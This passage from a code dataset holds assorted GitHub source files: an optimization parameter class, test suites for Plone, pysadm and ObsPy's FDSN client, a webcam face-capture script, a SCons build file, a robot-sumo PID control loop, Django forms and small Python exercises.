each product we can get by using a chosen technology and\n # one tonne of resource, e.g. a_{ij} defines how many tonnes of product i we will get by using technology j\n self.A = np.array([[0.000, 0.000, 0.311, 0.311, 0.000, 0.249, 0.000, 0.372, 0.373, 0.000, 0.000, 0.372],\n [0.265, 0.352, 0.000, 0.000, 0.000, 0.000, 0.211, 0.361, 0.000, 0.265, 0.000, 0.316],\n [0.000, 0.630, 0.420, 0.210, 0.505, 0.000, 0.000, 0.000, 0.000, 0.000, 0.588, 0.000],\n [0.136, 0.000, 0.000, 0.000, 0.328, 0.000, 0.492, 0.000, 0.328, 0.000, 0.273, 0.000],\n [0.577, 0.000, 0.000, 0.462, 0.138, 0.138, 0.277, 0.000, 0.277, 0.231, 0.115, 0.000],\n [0.000, 0.000, 0.243, 0.000, 0.000, 0.584, 0.000, 0.292, 0.000, 0.486, 0.000, 0.292]])\n\n # 'eps' defines the amount of waste in tonnes we get from one tonne of resource\n self.eps = np.array([0.022, 0.018, 0.026, 0.017, 0.029, 0.029,\n 0.020, 0.020, 0.022, 0.018, 0.024, 0.020]).reshape((1, self.N))\n\n # 'productivity' defines how much resource in tonnes can be processed by every technology\n self.productivity = np.array([15, 11, 17, 15, 18, 17,\n 13, 14, 20, 21, 24, 19]).reshape((1, self.N))\n self.inv_productivity = np.reciprocal(self.productivity.astype(np.float32))\n # 'plan' defines how many tonnes of each product we shall produce\n self.plan = np.array([135, 125, 150, 110, 150, 100]).reshape((1, self.M))\n # 'T1' available time for the first machine in hours\n self.T1 = 3\n # 'T2' available time for the second machine in hours\n self.T2 = 6\n # 'N1' contains technologies which could work on the first machine\n self.N1 = np.array([1, 2, 3, 4, 5, 6, 7, 8])\n # '__N2' contains technologies which could work on the second machine\n self.__N2 = np.array([8, 9, 10, 11, 12])\n # 'N2_ext' contains indices of technologies which could work only on the second machine\n # 'indices_dict' contains mapping between technology in the N1 and its copy in N2_ext\n self.N2_ext, self.indices_dict = self.__split_technologies()\n self.A_ext = self.__extend_matrix(self.A)\n self.A_ext_norm = np.round(self.A_ext / np.sum(self.A_ext, axis=0), 3)\n self.inv_P = self.__extend_matrix(self.inv_productivity)\n self.eps_ext = self.__extend_matrix(self.eps)\n self.N_ext = self.N1.size + self.N2_ext.size\n\n def __split_technologies(self):\n \"\"\" Gets the technologies which could work on both machines\n and stores them in a dictionary, where the key is the number of such a technology\n and the value is the corresponding index of its \"duplicated technology\".\n \"\"\"\n intersections = set.intersection(set(self.N1), set(self.__N2))\n new_indices = np.arange(self.N + 1, self.N + len(intersections) + 1)\n n2_ext = np.append(list(set(self.__N2) - set(self.N1)), new_indices)\n indices_dict = {list(intersections)[i]: new_indices[i] for i in range(0, len(intersections))}\n return n2_ext, indices_dict\n\n def __extend_matrix(self, mat):\n \"\"\" Duplicates information about technologies which\n could be run on both machines\n \"\"\"\n if mat.shape[1] != self.N:\n raise ValueError(\"Matrix has wrong amount of columns!\")\n mat_ext = mat.copy()\n for i in self.indices_dict.keys():\n mat_ext = np.c_[mat_ext, mat_ext[:, i - 1]]\n return mat_ext\n\n def __check_variables_shape(self, x):\n if x.shape != (1, self.N_ext):\n raise ValueError(\"Variables has wrong shape\")\n\n def get_time_values(self, x, technologies_indices):\n return cvxpy.multiply(x[:, technologies_indices - 1],\n self.inv_P[:, technologies_indices - 1])\n\n def get_time_1_values(self, x):\n self.__check_variables_shape(x)\n return self.get_time_values(x, ␍
self.N1)\n\n def get_time_2_values(self, x):\n self.__check_variables_shape(x)\n return self.get_time_values(x, self.N2_ext)\n\n def get_time(self, x, technologies_indices):\n self.__check_variables_shape(x)\n return cvxpy.sum(cvxpy.multiply(x[:, technologies_indices - 1],\n self.inv_P[:, technologies_indices - 1]))\n\n def get_time_1(self, x):\n self.__check_variables_shape(x)\n return self.get_time(x, self.N1)\n\n def get_time_2(self, x):\n self.__check_variables_shape(x)\n return self.get_time(x, self.N2_ext)\n\n def total_productivity(self, x):\n self.__check_variables_shape(x)\n return self.A_ext @ x.T\n","repo_name":"anastasia-spb/misis_smriz","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":5047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"37738623180","text":"# -*- coding: utf-8 -*-\nfrom bda.plone.orders.tests import Orders_INTEGRATION_TESTING\nfrom plone.testing import layered\nfrom plone.testing.zca import UNIT_TESTING\n\nimport doctest\nimport pprint # noqa\nimport unittest\n\n\noptionflags = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS\n\nTESTFILES = [\n (\"dynamicmailtemplate.rst\", UNIT_TESTING),\n (\"dynamicmaillibrary.rst\", Orders_INTEGRATION_TESTING),\n]\n\n\ndef test_suite():\n return unittest.TestSuite(\n [\n layered(\n doctest.DocFileSuite(\n filename, optionflags=optionflags, globs={\"pprint\": pprint.pprint}\n ),\n layer=layer,\n )\n for filename, layer in TESTFILES\n ]\n )\n","repo_name":"bluedynamics/bda.plone.orders","sub_path":"src/bda/plone/orders/tests/test_doctests.py","file_name":"test_doctests.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"}
+{"seq_id":"5452917527","text":"import cv2\nimport os\n\nface_cascade=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\ncam=cv2.VideoCapture(0)\ni=1\nwhile i<101:\n ret,frame=cam.read()\n if ret:\n gray=cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces=face_cascade.detectMultiScale(gray, 1.3, 5)\n for x,y,w,h in faces:\n cv2.imwrite('dataset/rohan/Rohan_'+str(i)+'.jpg',gray[y:y+h,x:x+w])\n i+=1 \n else:\n print('camera not working')\ncam.release()\ncv2.destroyAllWindows() \n","repo_name":"harshtitoria/Face-Recognition","sub_path":"face_data.py","file_name":"face_data.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"29740306301","text":"gcc = Environment(CCFLAGS=['-Wall', '-g'])\n\nclang = Environment(CXX='clang++', \n\tCCFLAGS=['-Wall', '-g'])\n\n# in GCC, the address sanitizer also includes the leak sanitizer\ngcc_address = gcc.Clone(CCFLAGS=['-fsanitize=address'],\n\tLINKFLAGS=['-fsanitize=address'])\n\nclang_memory = clang.Clone()\nclang_memory.Append(CCFLAGS=['-fsanitize=memory'],\n\tLINKFLAGS=['-fsanitize=memory'])\n\ngcc_address.Program('address.cpp')\nclang_memory.Program('memory.cpp')\n\n# catch2 is expected to be installed\ncatch = gcc_address.Clone()\n\ncatch.Program('samples.cpp')\n","repo_name":"sansajn/test","sub_path":"c++/sanitizers/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"}
+{"seq_id":"41267779447","text":"# STEP ON NUMBER PROBLEM\ndef steponNumber(list_number):\n list_output = []\n # check the criteria\n for i in list_number:\n x = i[0] # x coordinate\n y = i[1] # y coordinate\n\n ␍
# if x or y is negative\n if x < 0 or y < 0 : \n output = 'No Number' \n list_output.append(output) # append to the output list (the append further down is skipped because of the continue)\n continue # skip to the next iteration\n\n # diagonal-line criteria: (x equals y) and (x - y = 2)\n elif x - y == 0 or x - y == 2:\n if x == 0: # if x & y = 0, output 0\n output = 0\n elif x == 1: # if x & y = 1, output 1\n output = 1\n elif x % 2 == 0: # if x & y are even, output x+y\n output = x + y\n else : # if x & y are odd, output (x+y)-1\n output = (x + y) - 1\n\n else : # if the coordinate is not on the diagonal lines from the problem\n output = 'No Number'\n \n list_output.append(output)\n \n return list_output\n\nlist_awal = [[4,2], [6,6], [3,4]]\nprint(steponNumber(list_awal))\n","repo_name":"gustikresna/purwadhika-assignments-exams","sub_path":"modul1_python_programming/step_on_number.py","file_name":"step_on_number.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"72783045099","text":"from os import path\nfrom pytest import raises\n\nfrom _sadm.errors import PluginError, PluginScriptNotFound, PluginScriptNoExec\nfrom _sadm.errors import PluginScriptTimeout\nfrom _sadm.utils import scripts\n\nsdir = path.join(path.dirname(path.dirname(path.dirname(__file__))), 'tlib',\n\t'_sadmtest', 'scripts', 'testing', 'testing')\ns = scripts.Scripts('testing', 'testing', sdir = sdir)\n\ndef test_scripts_dir():\n\tassert s._dir == sdir\n\ndef test_noscript():\n\tspath = path.join(sdir, 'noscript.sh')\n\twith raises(PluginScriptNotFound, match = \"PluginScriptNotFound: %s\" % spath) as err:\n\t\ts.run('noscript.sh')\n\tassert err.errisinstance(PluginError)\n\ndef test_run():\n\trc = s.run('testing.sh')\n\tassert rc == 0\n\ndef test_run_error():\n\trc = s.run('testing-error.sh')\n\tassert rc == 1\n\ndef test_run_noexec():\n\tspath = path.join(sdir, 'testing-noexec.sh')\n\twith raises(PluginScriptNoExec, match = \"PluginScriptNoExec: %s\" % spath) as err:\n\t\ts.run('testing-noexec.sh')\n\tassert err.errisinstance(PluginError)\n\ndef test_timeout():\n\tspath = path.join(sdir, 'testing-timeout.sh')\n\tprevttl = scripts._TTL\n\tscripts._TTL = 0.2\n\twith raises(PluginScriptTimeout,\n\t\tmatch = \"PluginScriptTimeout: %s after 0.2 seconds\" % spath) as err:\n\t\ts.run('testing-timeout.sh', '1')\n\tassert err.errisinstance(PluginError)\n\tscripts._TTL = prevttl\n\ndef test_run_args():\n\trc = s.run('testing-args.sh', ('1', '2', '3'))\n\tassert rc == 0\n","repo_name":"jrmsdev/pysadm","sub_path":"t/scripts/plugin_scripts_test.py","file_name":"plugin_scripts_test.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"6630672240","text":"import zoneinfo\nfrom datetime import datetime\nfrom dateutil import tz\n\nif __name__ == '__main__':\n # Eastern time\n et = tz.gettz('America/New_York')\n\n last = datetime(2022, 2, 10, 21, 16, 55, tzinfo=et)\n last2 = datetime(2022, 2, 10, 21, 16, 55, tzinfo=zoneinfo.ZoneInfo('America/Vancouver'))\n last3 = datetime(2022, 2, 10, 21, 16, 55, tzinfo=zoneinfo.ZoneInfo('Europe/Moscow'))\n print(last)\n print(last2)\n ␍
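# Note: the same wall-clock time attached to three different zones yields three distinct absolute instants.\n 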
print(last3)\n\n","repo_name":"AlekseyKravchuk/coursera_dstructs_and_algorithms_spec","sub_path":"00_experiments/0.49_time_zones.py","file_name":"0.49_time_zones.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"14071723349","text":"def file_to_int_list(path):\n list_of_ints = []\n with open(path, \"r\") as f:\n line = f.readline()\n while line:\n list_of_ints.append(int(line))\n line = f.readline()\n return list_of_ints\n\n\none_list = file_to_int_list(\"one.txt\")\ntwo_list = file_to_int_list(\"two.txt\")\n\noverlap_list = [number for number in one_list if number in two_list] # duplicates of some numbers may appear here\n\nzbior1 = set(one_list)\nzbior2 = set(two_list)\n\noverlap = list(zbior1.intersection(zbior2)) # there will never be duplicates here\noverlap.sort()\n\noverlap_list.sort()\nprint(overlap)\nprint(overlap_list)\n","repo_name":"Gookuruto/Test","sub_path":"pliki/compare_two_files.py","file_name":"compare_two_files.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"32707846976","text":"import gymnasium\n# import sumogym\nimport time\nimport pprint\nimport numpy as np\n\nfrom . import joystick\nfrom . import utils\nfrom simple_pid import PID\nfrom typing import List\n\nfrom sumogym.envs.robot_sumo_single import RobotSumoSingleEnv\n\n\nenv = RobotSumoSingleEnv(render_mode=\"human\")\nobservation, info = env.reset()\n\npprint.pprint(observation)\npprint.pprint(info)\n\n\nprint(\"\")\nprint(\"\")\nprint(\"\")\nprint(\"\")\n\njoy = joystick.Joystick()\n\n# Constants for mapping joystick values to wheel speeds\nMAX_JOYSTICK_VALUE = 1\nMAX_WHEEL_SPEED = 10\n\n\n# Prepare PID controllers\n\nwheel_controllers: List[PID] = []\nfor _ in range(2):\n wheel_controllers.append(PID(10, 0.3, 0.0, setpoint=0, sample_time=env.timestep,\n output_limits=[-1, 1]))\n\n\nterminated = False\nwhile not terminated:\n\n # Calculate the wheel speeds\n left_speed_A = (joy.left_axis_y + joy.left_axis_x) * MAX_WHEEL_SPEED / MAX_JOYSTICK_VALUE\n right_speed_A = (joy.left_axis_y - joy.left_axis_x) * MAX_WHEEL_SPEED / MAX_JOYSTICK_VALUE\n\n desired_wheel_velocities = [left_speed_A, right_speed_A]\n\n current_wheel_velocities = observation[\"self_wheel_velocities\"]\n robot_torque_normalised = np.zeros(2)\n for ii, (wheel_controller, current_wheel_velocity, desired_wheel_velocity) in \\\n enumerate(zip(wheel_controllers, current_wheel_velocities, desired_wheel_velocities)): # For each wheel\n wheel_controller.setpoint = desired_wheel_velocity\n robot_torque_normalised[ii] = wheel_controller(current_wheel_velocity)\n action = robot_torque_normalised\n \n\n observation, reward, terminated, truncation, info = env.step(action)\n\n pprint.pprint(reward)\n pprint.pprint(type(reward))\n\n\n\n# # pprint.pprint(rewards)\n time.sleep(1/240.0)","repo_name":"unigamer/sumogym","sub_path":"sumogym/single_experiment_1.py","file_name":"single_experiment_1.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
+{"seq_id":"74315853099","text":"from django.forms import ModelForm, Form\nfrom django.contrib.admin.widgets import AdminFileWidget\nfrom .models import Asset, Check, AssetSignature\nfrom django import forms\nfrom jsignature.forms import ␍
JSignatureField\nfrom jsignature.widgets import JSignatureWidget\n\nyears = [x for x in range(2000, 2025)]\n\n\nclass AssetForm(ModelForm):\n class Meta:\n model = Asset\n exclude = ['', ]\n widgets = {'capitalized': forms.SelectDateWidget(years=years)}\n labels = {\n 'descr': 'Description',\n 'add_descr': 'Additional Description',\n }\n\n\nclass Checkin_Form(ModelForm):\n class Meta:\n model = Check\n exclude = ['',]\n labels = {\n 'document': 'Asset Return Form (signed)',\n }\n widgets = {\n 'asset': forms.HiddenInput(),\n 'staff': forms.HiddenInput(),\n 'check_type': forms.HiddenInput(),\n 'document': AdminFileWidget,\n }\n\n\nclass Checkout_Form(ModelForm):\n class Meta:\n model = Check\n exclude = ['',]\n labels = {\n 'document': 'Asset Assignment Form (signed)',\n }\n widgets = {\n 'asset': forms.HiddenInput(),\n 'check_type': forms.HiddenInput(),\n 'document': AdminFileWidget,\n }\n\nclass Signout_Form(ModelForm):\n class Meta:\n model = Check\n exclude = ['signature', 'approval_signature', 'document', 'check_type']\n labels = {'date': 'Date: (YYYY-MM-DD)',}\n\nclass Signout_Signature_Form(ModelForm):\n class Meta:\n model = AssetSignature\n widgets = {'signature': JSignatureWidget, }\n fields = ['signature', ]\n\nclass Signout_Signature_Approved_Form(ModelForm):\n class Meta:\n model = AssetSignature\n widgets = {'signature': JSignatureWidget, }\n fields = ['signature', ]\n\n\n","repo_name":"jameswhitakerwork/mtracker","sub_path":"assets/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71880150061","text":"import io\nimport re\nimport sys\nimport warnings\nfrom difflib import Differ\nfrom unittest import mock\n\nimport urllib.request as urllib_request\n\nimport lxml\nimport numpy as np\nimport pytest\nimport requests\n\nfrom obspy import UTCDateTime, read, read_inventory, Stream, Trace\nfrom obspy.core.util.base import NamedTemporaryFile\nfrom obspy.clients.fdsn import Client, RoutingClient\nfrom obspy.clients.fdsn.client import (build_url, parse_simple_xml,\n get_bulk_string)\nfrom obspy.clients.fdsn.header import (DEFAULT_USER_AGENT, URL_MAPPINGS,\n FDSNException, FDSNRedirectException,\n FDSNNoDataException,\n FDSNRequestTooLargeException,\n FDSNBadRequestException,\n FDSNNoAuthenticationServiceException,\n FDSNTimeoutException,\n FDSNNoServiceException,\n FDSNInternalServerException,\n FDSNTooManyRequestsException,\n FDSNNotImplementedException,\n FDSNBadGatewayException,\n FDSNServiceUnavailableException,\n FDSNUnauthorizedException,\n FDSNForbiddenException,\n FDSNDoubleAuthenticationException,\n FDSNInvalidRequestException,\n DEFAULT_SERVICES)\nfrom obspy.core.inventory import Response\nfrom obspy.geodetics import locations2degrees\n\n\nUSER_AGENT = \"ObsPy (test suite) \" + \" \".join(DEFAULT_USER_AGENT.split())\npytestmark = pytest.mark.network\n\n\ndef _normalize_stats(obj):\n if isinstance(obj, Stream):\n for tr in obj:\n _normalize_stats(tr)\n else:\n if \"processing\" in obj.stats:\n del obj.stats[\"processing\"]\n if \"_fdsnws_dataselect_url\" in obj.stats:\n del obj.stats._fdsnws_dataselect_url\n\n\ndef failmsg(got, expected, ignore_lines=[]):\n \"\"\"\n Create message on difference between objects.\n\n If both are strings create a line-by-line diff, otherwise create info on\n both using str().\n For diffs, lines that contain any string given in ignore_lines will be\n excluded from the comparison.\n \"\"\"\n if isinstance(got, str) 
and isinstance(expected, str):\n got = [line for line in got.splitlines(True)\n if all([x not in line for x in ignore_lines])]\n expected = [line for line in expected.splitlines(True)\n if all([x not in line for x in ignore_lines])]\n diff = Differ().compare(got, expected)\n diff = \"\".join([line for line in diff if line[0] in \"-+?\"])\n if diff:\n return \"\\nDiff:\\n%s\" % diff\n else:\n return \"\"\n else:\n return \"\\nGot:\\n%s\\nExpected:\\n%s\" % (str(got), str(expected))\n\n\ndef normalize_version_number(string):\n \"\"\"\n Returns input string with version numbers normalized for testing purposes.\n \"\"\"\n match = r'v[0-9]+\\.[0-9]+\\.[0-9]+'\n repl = re.sub(match, \"vX.X.X\", string).replace(\",\", \"\")\n return [line.strip() for line in repl.splitlines()]\n\n\nclass TestClient():\n \"\"\"\n Test cases for obspy.clients.fdsn.client.Client.\n \"\"\"\n @classmethod\n def setup_class(cls):\n cls.client = Client(base_url=\"IRIS\", user_agent=USER_AGENT)\n cls.client_auth = \\\n Client(base_url=\"IRIS\", user_agent=USER_AGENT,\n user=\"nobody@iris.edu\", password=\"anonymous\")\n\n def test_empty_bulk_string(self):\n \"\"\"\n Makes sure an exception is raised if an empty bulk string would be\n produced (e.g. empty list as input for `get_bulk_string()`)\n \"\"\"\n msg = (\"Empty 'bulk' parameter potentially leading to a FDSN request \"\n \"of all available data\")\n for bad_input in [[], '', None]:\n with pytest.raises(FDSNInvalidRequestException, match=msg):\n get_bulk_string(bulk=bad_input, arguments={})\n\n def test_validate_base_url(self):\n \"\"\"\n Tests the _validate_base_url() method.\n \"\"\"\n\n test_urls_valid = list(URL_MAPPINGS.values())\n test_urls_valid += [\n \"http://something.ethz.ch\",\n \"http://example.org\",\n \"https://webservices.rm.ingv.it\",\n \"http://localhost:8080/test/\",\n \"http://93.63.40.85/\",\n \"http://[::1]:80/test/\",\n \"http://[2001:db8:85a3:8d3:1319:8a2e:370:7348]\",\n \"http://[2001:db8::ff00:42:8329]\",\n \"http://[::ffff:192.168.89.9]\",\n \"http://jane\",\n \"http://localhost\",\n \"http://hyphenated-internal-hostname\",\n \"http://internal-machine.private\",\n \"https://long-public-tld.international\",\n \"http://punycode-tld.xn--fiqs8s\"]\n\n test_urls_fails = [\n \"http://\",\n \"http://127.0.1\",\n \"http://127.=.0.1\",\n \"http://127.0.0.0.1\",\n \"http://tld.too.long.\" + (\"x\" * 64)]\n test_urls_fails += [\n \"http://[]\",\n \"http://[1]\",\n \"http://[1:2]\",\n \"http://[1::2::3]\",\n \"http://[1::2:3::4]\",\n \"http://[1:2:2:4:5:6:7]\"]\n\n for url in test_urls_valid:\n assert self.client._validate_base_url(url), \\\n '%s should be valid' % url\n\n for url in test_urls_fails:\n assert not self.client._validate_base_url(url), \\\n '%s should be invalid' % url\n\n def test_url_building(self):\n \"\"\"\n Tests the build_url() functions.\n \"\"\"\n # Application WADL\n assert build_url(\"http://service.iris.edu\", \"dataselect\", 1,\n \"application.wadl\") == \\\n \"http://service.iris.edu/fdsnws/dataselect/1/application.wadl\"\n assert build_url(\"http://service.iris.edu\", \"event\", 1,\n \"application.wadl\") == \\\n \"http://service.iris.edu/fdsnws/event/1/application.wadl\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"application.wadl\") == \\\n \"http://service.iris.edu/fdsnws/station/1/application.wadl\"\n\n # Test one parameter.\n assert build_url(\"http://service.iris.edu\", \"dataselect\", 1,\n \"query\", {\"network\": \"BW\"}) == \\\n ␍
\"http://service.iris.edu/fdsnws/dataselect/1/query?network=BW\"\n assert build_url(\"http://service.iris.edu\", \"dataselect\", 1,\n \"queryauth\", {\"network\": \"BW\"}) == \\\n \"http://service.iris.edu/fdsnws/dataselect/1/queryauth?network=BW\"\n # Test two parameters. Note random order, two possible results.\n assert build_url(\"http://service.iris.edu\", \"dataselect\", 1,\n \"query\", {\"net\": \"A\", \"sta\": \"BC\"}) in \\\n (\"http://service.iris.edu/fdsnws/dataselect/1/query?net=A&sta=BC\",\n \"http://service.iris.edu/fdsnws/dataselect/1/query?sta=BC&net=A\")\n\n # A wrong service raises a ValueError\n with pytest.raises(ValueError):\n build_url(\"http://service.iris.edu\", \"obspy\", 1, \"query\")\n\n def test_location_parameters(self):\n \"\"\"\n Tests how the variety of location values are handled.\n\n Why location? Mostly because it is one tricky parameter. It is not\n uncommon to assume that a non-existent location is \"--\", but in reality\n \"--\" is \"<space><space>\". This substitution exists because mostly\n because various applications have trouble digesting spaces (spaces in\n the URL, for example).\n The confusion begins when location is treated as empty instead, which\n would imply \"I want all locations\" instead of \"I only want locations of\n <space><space>\"\n \"\"\"\n # requests with no specified location should be treated as a wildcard\n assert not (\"--\" in build_url(\n \"http://service.iris.edu\", \"station\", 1, \"query\",\n {\"network\": \"IU\", \"station\": \"ANMO\", \"starttime\": \"2013-01-01\"}))\n # location of \" \" is the same as \"--\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \" \"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?location=--\"\n # wildcard locations are valid. Will be encoded.\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"*\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?location=%2A\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"A?\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?location=A%3F\"\n\n # lists are valid, including <space><space> lists. 
Again encoded\n # result.\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \" ,1?,?0\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=--%2C1%3F%2C%3F0\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"1?,--,?0\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=1%3F%2C--%2C%3F0\"\n\n # Test all three special cases with empty parameters into lists.\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \" ,AA,BB\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=--%2CAA%2CBB\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"AA, ,BB\"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=AA%2C--%2CBB\"\n assert build_url(\"http://service.iris.edu\", \"station\", 1,\n \"query\", {\"location\": \"AA,BB, \"}) == \\\n \"http://service.iris.edu/fdsnws/station/1/query?\" \\\n \"location=AA%2CBB%2C--\"\n\n # The location parameter is also passed through the\n # _create_url_from_parameters() method and thus has to survive it!\n # This guards against a regression where all empty location codes\n # where removed by this function!\n for service in [\"station\", \"dataselect\"]:\n for loc in [\"\", \" \", \" \", \"--\", b\"\", b\" \", b\" \", b\"--\",\n u\"\", u\" \", u\" \", u\"--\"]:\n assert \"location=--\" in \\\n self.client._create_url_from_parameters(\n service, [],\n {\"location\": loc, \"starttime\": 0, \"endtime\": 1})\n\n # Also check the full call with a mock test.\n for loc in [\"\", \" \", \" \", \"--\", b\"\", b\" \", b\" \", b\"--\",\n u\"\", u\" \", u\" \", u\"--\"]:\n with mock.patch(\"obspy.clients.fdsn.Client._download\") as p:\n self.client.get_stations(0, 0, location=loc,\n filename=mock.Mock())\n assert p.call_count == 1\n assert \"location=--\" in p.call_args[0][0]\n with mock.patch(\"obspy.clients.fdsn.Client._download\") as p:\n self.client.get_waveforms(1, 2, loc, 4, 0, 0,\n filename=mock.Mock())\n assert p.call_count == 1\n assert \"location=--\" in p.call_args[0][0]\n\n def test_url_building_with_auth(self):\n \"\"\"\n Tests the Client._build_url() method with authentication.\n\n Necessary on top of test_url_building test case because clients with\n authentication have to build different URLs for dataselect.\n \"\"\"\n # no authentication\n got = self.client._build_url(\"dataselect\", \"query\", {'net': \"BW\"})\n expected = \"http://service.iris.edu/fdsnws/dataselect/1/query?net=BW\"\n assert got == expected\n # with authentication\n got = self.client_auth._build_url(\"dataselect\", \"query\", {'net': \"BW\"})\n expected = (\"http://service.iris.edu/fdsnws/dataselect/1/\"\n \"queryauth?net=BW\")\n assert got == expected\n\n def test_set_credentials(self):\n \"\"\"\n Test for issue #2146\n\n When setting credentials not during `__init__` but using\n `set_credentials`, waveform queries should still properly go to\n \"queryauth\" endpoint.\n \"\"\"\n client = Client(base_url=\"IRIS\", user_agent=USER_AGENT)\n user = \"nobody@iris.edu\"\n password = \"anonymous\"\n client.set_credentials(user=user, password=password)\n got = client._build_url(\"dataselect\", \"query\", {'net': \"BW\"})\n expected = (\"http://service.iris.edu/fdsnws/dataselect/1/\"\n \"queryauth?net=BW\")\n assert got == expected\n # more basic test: check that set_credentials has set Client.user\n # (which is tested when checking 
which endpoint to use, query or\n # queryauth)\n assert client.user == user\n\n @pytest.mark.skip(reason='data no longer available')\n def test_trim_stream_after_get_waveform(self):\n \"\"\"\n Tests that stream is properly trimmed to user requested times after\n fetching from datacenter, see #1887\n \"\"\"\n c = Client(\n service_mappings={'dataselect':\n 'http://ws.ipgp.fr/fdsnws/dataselect/1'})\n starttime = UTCDateTime('2016-11-01T00:00:00')\n endtime = UTCDateTime('2016-11-01T00:00:10')\n stream = c.get_waveforms('G', 'PEL', '*', 'LHZ', starttime, endtime)\n assert starttime == stream[0].stats.starttime\n assert endtime == stream[0].stats.endtime\n\n def test_service_discovery_iris(self):\n \"\"\"\n Tests the automatic discovery of services with the IRIS endpoint. The\n test parameters are taken from IRIS' website.\n\n This will have to be adjusted once IRIS changes their implementation.\n \"\"\"\n client = self.client\n assert {*client.services.keys()} == \\\n {\"dataselect\", \"event\", \"station\", \"available_event_contributors\",\n \"available_event_catalogs\"}\n\n # The test sets are copied from the IRIS webpage.\n assert {*client.services[\"dataselect\"].keys()} == \\\n {\"starttime\", \"endtime\", \"network\", \"station\", \"location\",\n \"channel\", \"quality\", \"minimumlength\", \"longestonly\"}\n assert {*client.services[\"station\"].keys()} == \\\n {\"starttime\", \"endtime\", \"startbefore\", \"startafter\",\n \"endbefore\", \"endafter\", \"network\", \"station\", \"location\",\n \"channel\", \"minlatitude\", \"maxlatitude\", \"minlongitude\",\n \"maxlongitude\", \"latitude\", \"longitude\", \"minradius\",\n \"maxradius\", \"level\", \"includerestricted\", \"format\",\n \"includeavailability\", \"updatedafter\", \"matchtimeseries\"}\n assert {*client.services[\"event\"].keys()} == \\\n {\"starttime\", \"endtime\", \"minlatitude\", \"maxlatitude\",\n \"minlongitude\", \"maxlongitude\", \"latitude\", \"longitude\",\n \"maxradius\", \"minradius\", \"mindepth\", \"maxdepth\",\n \"minmagnitude\", \"maxmagnitude\",\n \"magnitudetype\", \"format\",\n \"catalog\", \"contributor\", \"limit\", \"offset\", \"orderby\",\n \"updatedafter\", \"includeallorigins\", \"includeallmagnitudes\",\n \"includearrivals\", \"eventid\",\n \"originid\"} # XXX: This is currently just specified in the WADL\n\n # Also check an exemplary value in more detail.\n minradius = client.services[\"event\"][\"minradius\"]\n assert minradius[\"default_value\"] == 0.0\n assert not minradius[\"required\"]\n assert minradius[\"doc\"] == \"\"\n assert minradius[\"doc_title\"] == (\n \"Specify minimum distance from the geographic point defined by \"\n \"latitude and longitude\")\n assert minradius[\"type\"] == float\n assert minradius[\"options\"] == []\n\n def test_iris_event_catalog_availability(self):\n \"\"\"\n Tests the parsing of the available event catalogs.\n \"\"\"\n assert {*self.client.services[\"available_event_catalogs\"]} == \\\n {\"GCMT\", \"ISC\", \"NEIC PDE\"}\n\n def test_iris_event_contributors_availability(self):\n \"\"\"\n Tests the parsing of the available event contributors.\n \"\"\"\n response = requests.get(\n 'http://service.iris.edu/fdsnws/event/1/contributors')\n xml = lxml.etree.fromstring(response.content)\n expected = {\n elem.text for elem in xml.xpath('/Contributors/Contributor')}\n # check that we have some values in there\n assert len(expected) > 5\n assert {*self.client.services[\"available_event_contributors\"]} == \\\n expected\n\n def test_discover_services_defaults(self):\n 
